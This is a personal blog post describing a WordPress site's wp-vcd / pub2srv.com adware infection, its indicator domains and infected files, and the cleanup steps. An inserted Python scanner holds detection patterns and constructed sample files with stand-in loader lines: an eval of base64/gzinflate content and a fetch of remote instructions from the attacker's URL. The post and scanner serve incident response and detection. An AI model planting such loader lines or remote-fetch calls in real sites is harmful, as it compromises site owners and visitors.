What To Do If Your WordPress Site Is Infected By pub2srv.com Adware

This site was infected by adware between end of August 2017 and 26 October 2017.

What happened

I realized something was wrong when I visited my own site this morning and discovered that there were popup and redirection when I clicked on anywhere on the page.

The Evil Adware

Also, when I checked the analytics of the site, there were practically no visitors since the beginning of September 2017.

Practically Zero Visitors Since September 2017

Investigation

I ran a test using the Pingdom tool (you can see the scan result by clicking the link) and confirmed that my WordPress site was infected by adware.

Here are the findings:

pub2srv.com

mobisla.com

deloton.com

Some unknown scripts were being injected into the site.

  • http://deloton.com/apu.php?zoneid=1063894
  • go.pub2srv.com
  • http://go.pushnative.com/notice.php?p=628268&interactive=1&pushup=1
  • go.mobisla.com

Root cause analysis

When I scanned the WordPress installation folders on the server for files containing the keyword “pub2srv.com”, I found nothing.

The hacker is good at playing hide-and-seek.

With help from Google, it turned out that the malicious code was hidden in multiple files located in the <WordPress installation path>/wp-includes/ folder.

Here is the list of the infected files:

  • wp-feed.php: contains a list of IP addresses
  • wp-vcd.php: contains a compressed malicious installation program
  • class.wp.php: contains SQL injections and cross-site scripting
  • post.php: contains the reference to wp-vcd.php

Here is the sample content of class.wp.php:

The above code adds (injects) a user into the database.

It is also loading content from http://www.aotson.com/codexc.txt which contains the following instructions:

The hacker is able to target a specific infected site by changing the path remotely via http://www.aotson.com/codexc.txt. Pretty clever and super evil.

It is capable of spreading itself to every WordPress site hosted under my user account, across different domain names.

More detail can be found here: wp-vcd.php malware analysis.
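Since a plain keyword search for “pub2srv.com” found nothing, a useful check is to look for the traces this infection actually leaves on disk: non-core files dropped into wp-includes/, references to wp-vcd.php or to the remote instruction URL, and code that evaluates decoded or remotely fetched content. The following Python scanner is an added example, not code from the original post; the file names and URL come from the findings above, while the eval() heuristic and the sample file contents are my own constructed assumptions.

```python
import os
import re
import tempfile

# Filenames the post found dropped into wp-includes/ (none of them is a WordPress core file).
DROPPED_NAMES = {"wp-feed.php", "wp-vcd.php", "class.wp.php"}
# Strings the post ties to this infection: the loader reference and the remote instruction URL.
INDICATORS = ("wp-vcd.php", "aotson.com/codexc.txt", "pub2srv.com")
# Assumed heuristic, not from the post: eval() fed by a decoder or a remote fetch is how a
# "compressed" payload like the one in wp-vcd.php gets unpacked at run time.
EVAL_PATTERN = re.compile(
    r"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|file_get_contents|str_rot13)\s*\(",
    re.IGNORECASE)

def scan_wordpress(root):
    """Walk a WordPress install; return sorted (relative_path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if os.path.basename(dirpath) == "wp-includes" and name in DROPPED_NAMES:
                findings.append((rel, "non-core file in wp-includes"))
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for ind in INDICATORS:
                if ind in text:
                    findings.append((rel, "references " + ind))
            if EVAL_PATTERN.search(text):
                findings.append((rel, "eval() of decoded or remote content"))
    return sorted(findings)

def build_sample_site():
    """Write a constructed mini WordPress tree: one clean file and three suspicious ones."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    inc = os.path.join(root, "wp-includes")
    os.makedirs(inc)
    samples = {  # constructed file bodies modelled on the post's description, not real samples
        "post.php": "<?php /* core */ include_once('wp-vcd.php'); ?>",
        "wp-vcd.php": "<?php eval(gzinflate(base64_decode('...'))); ?>",
        "class.wp.php": "<?php $c = file_get_contents('http://www.aotson.com/codexc.txt'); ?>",
        "functions.php": "<?php function wp_ok() { return true; } ?>",
    }
    for name, body in samples.items():
        with open(os.path.join(inc, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```

Point `scan_wordpress()` at a real installation path to list the flagged files; a clean core file such as functions.php in the sample tree produces no finding.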

Lesson learnt

It is clear that the root cause was due to me installing untrusted WordPress themes on my site.

Based on the evidence from the backup that I have, the infection occurred earlier than mid-August.

However, the symptoms (unusual slowness and trouble) only appeared towards the end of August.

Solution

Here is an article on how to remove pub2srv malware to learn more about the adware/malware.

Here are the details from other people who were facing the same issue.

I installed the Anti-Malware Security and Brute-Force Firewall plugin and ran a scan. The 254 affected files were removed after the scan.

I updated my WordPress theme to the latest version.

I reinstalled the WordPress version 4.8.2.

I also updated the login password.

I also updated the server user login password just in case.

Final thought

Maintaining a website is similar to maintaining my health. I need to monitor it regularly to avoid temporary death from happening again.

The site has been as good as dead for the past two months.

I realized that cyber risk is a real threat that could impact a lot of people. An infected site is capable of spreading malware to innocent visitors and might cause them serious damage.

It is important to keep information systems secure so that I never encounter a similar incident again. Here is a self-study guide, CISSP (ISC)2 Certified Information Systems Security Professional Official Study Guide, that contains information on how to maintain security in a world surrounded by cyber risks. Grab a copy if you are interested.